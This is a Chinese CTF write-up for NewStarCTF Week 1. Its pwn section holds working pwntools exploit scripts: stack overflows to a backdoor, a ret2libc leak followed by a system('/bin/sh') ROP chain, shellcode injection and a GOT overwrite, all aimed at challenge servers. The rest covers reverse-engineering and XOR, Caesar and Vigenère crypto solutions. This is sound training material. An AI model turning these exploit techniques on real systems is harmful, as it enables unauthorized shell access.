NewStarCTFWEEK1部分题解

NewStarCTFWEEK1

  • pwn
    • ret2text:
    • calc:
    • ret2libc:
    • ret2shellcode:
    • fallw1nd’s gift:
  • RE
    • Hello_Reverse:
    • Baby_Re:
  • CRYPTO:
    • caeser:
    • 吉奥万·巴蒂斯塔·贝拉索先生的密码:
    • eazyxor:

pwn

ret2text:

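from pwn import *

# Local process by default; swap in the remote() line to hit the challenge box.
r = process('./pwn')
#r = remote('node4.buuoj.cn', 25509)
elf = ELF('./pwn')

# Address of the backdoor function; the binary is not PIE so it is fixed.
backdoor = 0x400708

# 0x20 bytes of padding plus 8 for the saved rbp (offsets per the write-up)
# bring us to the saved return address, which is redirected to the backdoor.
# Byte literals avoid mixing str and bytes (p64() returns bytes) if this is
# ever run under Python 3; on Python 2 they are identical to the original.
payload = b'a' * 0x20 + b'b' * 8 + p64(backdoor)
r.sendline(payload)
r.interactive()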

calc:

用 Python 自动计算题目发来的算式。注意：脚本里直接对远程服务返回的文本调用 eval()，这等于允许对端在本机执行任意 Python 代码；CTF 环境下图省事可以，但更稳妥的做法是用 ast 只解析数字和加减乘除节点。

from pwn import *

# Binary and libc paths.  `select` chooses the target: 0 runs the binary
# locally, anything else connects to the remote challenge box.
local_file  = './cala'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1

if select != 0:
    r = remote('node4.buuoj.cn', 25712)
    libc = ELF(remote_libc)
else:
    r = process(local_file)
    libc = ELF(local_libc)

elf = ELF(local_file)
context.log_level = 'debug'   # echo every byte sent and received
context.arch = elf.arch


# Tube helpers over `r`; the exploit body below uses these short names.
def se(data):
    return r.send(data)


def sa(delim, data):
    return r.sendafter(delim, data)


def sl(data):
    return r.sendline(data)


def sla(delim, data):
    return r.sendlineafter(delim, data)


def sea(delim, data):
    # Same as sa(); kept because the template exposes both names.
    return r.sendafter(delim, data)


def rc(numb=4096):
    return r.recv(numb)


def rl():
    return r.recvline()


def ru(delims):
    return r.recvuntil(delims)


def uu32(data):
    # Zero-pad a short leak to 4 bytes before unpacking.
    return u32(data.ljust(4, b'\0'))


def uu64(data):
    # Zero-pad a short leak (e.g. a 6-byte userland pointer) to 8 bytes.
    return u64(data.ljust(8, b'\0'))


def info(tag, addr):
    return r.info(tag + ': {:#x}'.format(addr))
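def debug(cmd=''):
    """Attach gdb to the live target; `cmd` is the gdb script to run."""
    gdb.attach(r, cmd)


def safe_arith_eval(expr):
    """Evaluate `expr` as plain arithmetic on numeric literals and return the result.

    Replaces eval() on text received from the challenge server.  eval() runs
    whatever the peer sends, so a hostile or compromised server could answer
    with `__import__('os').system('...')` and execute code on the solver's
    machine.  Only numeric constants, the binary operators + - * / // % **
    and unary +/- are accepted.

    Args:
        expr: str or bytes holding one expression, e.g. "12*34".

    Returns:
        The numeric result.  `/` is evaluated by the running interpreter, so it
        floors on Python 2 and is true division on Python 3 -- exactly what
        eval() gave.

    Raises:
        ValueError: on unparsable input or any disallowed syntax (names, calls,
            attribute access, strings, ...).
    """
    import ast
    import numbers
    import operator

    binops = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: lambda a, b: a / b,
        ast.FloorDiv: operator.floordiv,
        ast.Mod: operator.mod,
        ast.Pow: operator.pow,
    }
    unaryops = {ast.UAdd: operator.pos, ast.USub: operator.neg}

    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.BinOp) and type(node.op) in binops:
            return binops[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in unaryops:
            return unaryops[type(node.op)](walk(node.operand))
        # Numeric literal: ast.Constant on 3.8+, ast.Num on 2.7 / older 3.x.
        if isinstance(node, getattr(ast, 'Constant', ())):
            value = node.value
        elif isinstance(node, getattr(ast, 'Num', ())):
            value = node.n
        else:
            raise ValueError('disallowed syntax in expression %r' % (expr,))
        if isinstance(value, bool) or not isinstance(value, numbers.Number):
            raise ValueError('non-numeric literal in expression %r' % (expr,))
        return value

    try:
        tree = ast.parse(expr, mode='eval')
    except SyntaxError as exc:
        raise ValueError('unparsable expression %r: %s' % (expr, exc))
    return walk(tree)


#-----------------------------
# Answer 100 rounds.  The server writes multiplication as 'x', so map it to
# '*' before evaluating.  Byte literals keep this working under Python 3,
# where the tube returns bytes (identical to the original on Python 2).
for _ in range(100):
    ru(b'What\'s the answer? ')
    question = r.recvuntil(b'=', drop=True)
    sl(str(safe_arith_eval(question.replace(b'x', b'*'))))
r.interactive()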

ret2libc:

唯一需要注意的是 glibc 2.27 及以上版本要在第二段 ROP 链前多放一个 ret gadget 调整栈帧：system() 内部会执行 movaps 指令，要求 rsp 按 16 字节对齐，否则会直接崩溃。

from pwn import *

# Binary and libc paths.  `select` chooses the target: 0 runs the binary
# locally, anything else connects to the remote challenge box.
local_file  = './pwn'
local_libc  = './libc-2.31.so'
remote_libc = './libc-2.31.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1

if select != 0:
    r = remote('node4.buuoj.cn', 29708)
    libc = ELF(remote_libc)
else:
    r = process(local_file)
    libc = ELF(local_libc)

elf = ELF(local_file)
context.log_level = 'debug'   # echo every byte sent and received
context.arch = elf.arch


# Tube helpers over `r`; the exploit body below uses these short names.
def se(data):
    return r.send(data)


def sa(delim, data):
    return r.sendafter(delim, data)


def sl(data):
    return r.sendline(data)


def sla(delim, data):
    return r.sendlineafter(delim, data)


def sea(delim, data):
    # Same as sa(); kept because the template exposes both names.
    return r.sendafter(delim, data)


def rc(numb=4096):
    return r.recv(numb)


def rl():
    return r.recvline()


def ru(delims):
    return r.recvuntil(delims)


def uu32(data):
    # Zero-pad a short leak to 4 bytes before unpacking.
    return u32(data.ljust(4, b'\0'))


def uu64(data):
    # Zero-pad a short leak (e.g. a 6-byte userland pointer) to 8 bytes.
    return u64(data.ljust(8, b'\0'))


def info(tag, addr):
    return r.info(tag + ': {:#x}'.format(addr))
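def debug(cmd=''):
    """Attach gdb to the live target; `cmd` is the gdb script to run."""
    gdb.attach(r, cmd)


#------------------
# Gadgets in the (non-PIE) binary: `pop rdi; ret` sets the first argument,
# and a bare `ret` is used only to realign the stack (see stage 2).
pop_rdi = 0x400753
ret = 0x40050e
# 0x20 bytes of padding plus 8 for the saved rbp reach the return address.
# Byte literals keep str and bytes apart if this is run under Python 3.
pad = b'a' * 0x20 + b'b' * 8
prompt = b'Glad to meet you again!What u bring to me this time?\n'

# Stage 1: puts(puts@got) leaks puts' runtime address, then return to main
# so we get a second overflow.
stage1 = p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.sym['puts']) + p64(elf.sym['main'])
sla(prompt, pad + stage1)
# A userland libc pointer looks like 0x00007fxxxxxxxxxx: read up to the 0x7f
# byte and unpack the last 6 bytes.  (The original called this `got`, which
# was misleading: it is the leaked address of puts, not the GOT slot.)
puts_addr = uu64(ru(b'\x7f')[-6:])
base = puts_addr - libc.sym['puts']
print(hex(base))
system = base + libc.sym['system']
# Find "/bin/sh" in the libc actually loaded instead of hard-coding the
# 0x1b45bd offset of one particular 2.31 build.
binsh = base + next(libc.search(b'/bin/sh\x00'))

# Stage 2: system("/bin/sh").  The extra `ret` realigns rsp to 16 bytes:
# system() in glibc >= 2.27 executes movaps, which faults on a misaligned stack.
stage2 = p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)
sla(prompt, pad + stage2)
#debug()
r.interactive()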

ret2shellcode:

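from pwn import *

# Binary and libc paths; `select` picks local (0) or remote (anything else).
# libc is loaded for template consistency only -- this exploit never needs a
# libc address, the shellcode is self-contained.
local_file  = './shell'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn', 25903)
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch   # asm()/shellcraft below assemble for the binary's arch
sla = lambda delim, data: r.sendlineafter(delim, data)
#-----------------------------
# Address the return is redirected to -- presumably the fixed, executable
# buffer the first input ("gift") is stored in.  The write-up does not say
# how it was found; confirm with gdb (vmmap) before reusing on another build.
shellcode_addr = 0x233000

# First input: an execve("/bin/sh") shellcode.
sla(b'Hello my friend.Any gift for me?\n', asm(shellcraft.sh()))
# Second input overflows the stack: 0x30 bytes of padding, 8 for the saved
# rbp, then the return address pointed into the buffer above.  Byte literals
# avoid str+bytes mixing under Python 3 (identical to the original on Python 2).
sla(b'Anything else?\n', b'a' * 0x30 + b'b' * 8 + p64(shellcode_addr))
r.interactive()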

fallw1nd’s gift:

GOT Hijacking：程序先把 puts 的运行时地址作为“礼物”打印出来，随后允许往指定地址写入 8 字节。用泄露的地址算出 libc 基址和 system 地址，再把 system 写入 GOT 表项即可劫持控制流。

用 gdb 调试确认 addr 应以什么格式输入（脚本里发送的是不带 0x 前缀的十六进制字符串）。

用 objdump -d -M intel ./fallw1nd_gift 去找 puts 的 plt 表项，进而确定要覆盖的 GOT 地址。

from pwn import *

# Binary and libc paths.  `select` chooses the target: 0 runs the binary
# locally, anything else connects to the remote challenge box.
local_file  = './fallw1nd_gift'
local_libc  = './libc-2.31.so'
remote_libc = './libc-2.31.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1

if select != 0:
    r = remote('node4.buuoj.cn', 25419)
    libc = ELF(remote_libc)
else:
    r = process(local_file)
    libc = ELF(local_libc)

elf = ELF(local_file)
context.log_level = 'debug'   # echo every byte sent and received
context.arch = elf.arch


# Tube helpers over `r`; the exploit body below uses these short names.
def se(data):
    return r.send(data)


def sa(delim, data):
    return r.sendafter(delim, data)


def sl(data):
    return r.sendline(data)


def sla(delim, data):
    return r.sendlineafter(delim, data)


def sea(delim, data):
    # Same as sa(); kept because the template exposes both names.
    return r.sendafter(delim, data)


def rc(numb=4096):
    return r.recv(numb)


def rl():
    return r.recvline()


def ru(delims):
    return r.recvuntil(delims)


def uu32(data):
    # Zero-pad a short leak to 4 bytes before unpacking.
    return u32(data.ljust(4, b'\0'))


def uu64(data):
    # Zero-pad a short leak (e.g. a 6-byte userland pointer) to 8 bytes.
    return u64(data.ljust(8, b'\0'))


def info(tag, addr):
    return r.info(tag + ': {:#x}'.format(addr))
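def debug(cmd=''):
    """Attach gdb to the live target; `cmd` is the gdb script to run."""
    gdb.attach(r, cmd)


#----------------------
ru(b'gift as reward:\n')
# The service prints puts()'s runtime address as "0x" + 12 hex digits
# (14 characters).  recvn() waits for exactly 14 bytes (recv(14) may return
# fewer), and int(..., 16) parses them.  The original eval()'d this text,
# which lets a hostile or compromised server run arbitrary Python on the
# solver's machine.  (Named `puts_got` before, but it is the leaked libc
# address of puts, not the GOT slot.)
puts_addr = int(r.recvn(14), 16)
print(hex(puts_addr))
base = puts_addr - libc.sym['puts']
print(hex(base))
system = base + libc.sym['system']

# Slot to overwrite, found with gdb/objdump as the write-up describes -- a
# GOT entry, but which function's is not recorded here; confirm before reuse.
# The service expects the address as bare hex digits without the 0x prefix.
got_slot = 0x4033f8
#debug()
sla(b'now input your addr:\n', '%x' % got_slot)
# Overwrite the slot with system's address; the next call through it
# becomes system().
se(p64(system))
#debug()
r.interactive()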

RE

Hello_Reverse:

在 IDA 中按 Shift+F12 打开 Strings 窗口，发现字符串 flag{h3llo_r

再找到交互函数,发现有个strcpy(&Dest, &Source);

把那些变量都用char显示

组合一下flag{h3llo_r3vers1ng_w0rld}

Baby_Re:

发现0x20的data段的字符串

function_name 会替换 data 段字符串中的 4 个字符（从 flag 内容 S0meth1ng_run_bef0re_main 推测，它是 main 之前执行的函数），脚本里对应修改了 s[6]、s[0xb]、s[0x16]、s[0x1e]。

输入字符串的第 i 个字符与下标 i 异或后，和 data 段字符串的第 i 个字节比较；因此 flag[i] = s[i] ^ i，直接异或即可还原，不必逐位爆破。

得出flag

flag{S0meth1ng_run_bef0re_main!}

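#Baby_Re
# The 0x20-byte string found in the binary's .data section.  Four bytes are
# patched below: the write-up notes that function_name replaces four
# characters (presumably before main runs, going by the flag text), so the
# binary compares against the patched table, not the raw .data bytes.
s = [0x66, 0x6D, 0x63, 0x64, 0x7F, 0x56, 0x69, 0x6A, 0x6D, 0x7D, 0x62, 0x62, 0x62, 0x6A, 0x51, 0x7D, 0x65, 0x7F, 0x4D, 0x71, 0x71, 0x73, 0x79, 0x65, 0x7D, 0x46, 0x77, 0x7A, 0x75, 0x73, 0x21, 0x62]
s[6] = 0x36
s[0xb] = 0x3a
s[0x16] = 0x26
s[0x1e] = 0x3f


def decode_index_xor(cipher):
    """Undo ``cipher[i] = plain[i] ^ i`` and return the plaintext as a str.

    The binary XORs each input character with its index and compares it to
    the table above.  XOR is its own inverse, so ``plain[i] = cipher[i] ^ i``
    directly; the original brute-forced 128 candidates per position.

    Args:
        cipher: sequence of ints (the patched .data bytes).

    Returns:
        The recovered plaintext string.

    Raises:
        ValueError: if a recovered byte is not 7-bit ASCII.  The original loop
            silently skipped such a position, producing a shorter, mis-aligned
            "flag" with no warning.
    """
    recovered = [c ^ i for i, c in enumerate(cipher)]
    for pos, byte in enumerate(recovered):
        if not 0 <= byte < 128:
            raise ValueError('non-ASCII byte %#x recovered at index %d' % (byte, pos))
    return ''.join(chr(b) for b in recovered)


flag = decode_index_xor(s)
print(flag)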

CRYPTO:

caeser:

凯撒密码，位移为 13（即 ROT13）

flag{historical_cipher_is_vulnerable}

吉奥万·巴蒂斯塔·贝拉索先生的密码:

flag{bruteforce_is_useful_for_breaking_cipher}

维吉尼亚密码（Vigenère），对照表格反推可得密钥为 kfc

维吉尼亚密码转换器_维吉尼亚密码解密加密_维吉尼亚密码在线翻译 (00cha.net)

离谱的是解出这题时室友正在吃kfc

eazyxor:

单字节异或：flag 以 'f'（ASCII 102）开头，而密文首字节为 155，故 key = 155 ^ 102 = 253（0xfd）；用该 key 异或整段密文即得 flag：

flag{x0r_i5_qu1t3_3azy}

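#eazyxor
from os import urandom  # unused here; presumably left over from the challenge's encrypt script -- TODO confirm

# Ciphertext bytes (hex: 9b919c9a8685cd8fa294c8a28c88cc89cea2ce9c878480).
s = [155, 145, 156, 154, 134, 133, 205, 143, 162, 148, 200, 162, 140, 136, 204, 137, 206, 162, 206, 156, 135, 132, 128]
# Known-plaintext: the flag starts with 'f' (ASCII 102) and the first
# ciphertext byte is 155, so the single-byte key is 155 ^ 102 == 253.
key = s[0] ^ ord('f')


def xor_single_byte(cipher, key):
    """Decrypt `cipher` (a sequence of ints) XORed with the repeating byte `key`.

    XOR is its own inverse, so each plaintext byte is simply ``c ^ key``; the
    original brute-forced 128 candidates per position to find the same value.

    Args:
        cipher: sequence of ints in 0..255.
        key: the single key byte (int).

    Returns:
        The plaintext as a str.

    Raises:
        ValueError: if a decrypted byte falls outside 7-bit ASCII.  The original
            loop silently skipped such positions, which would shift every later
            character of the "flag" without any warning.
    """
    plain = [c ^ key for c in cipher]
    for pos, byte in enumerate(plain):
        if not 0 <= byte < 128:
            raise ValueError('non-ASCII byte %#x at index %d' % (byte, pos))
    return ''.join(chr(b) for b in plain)


flag = xor_single_byte(s, key)
print(flag)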
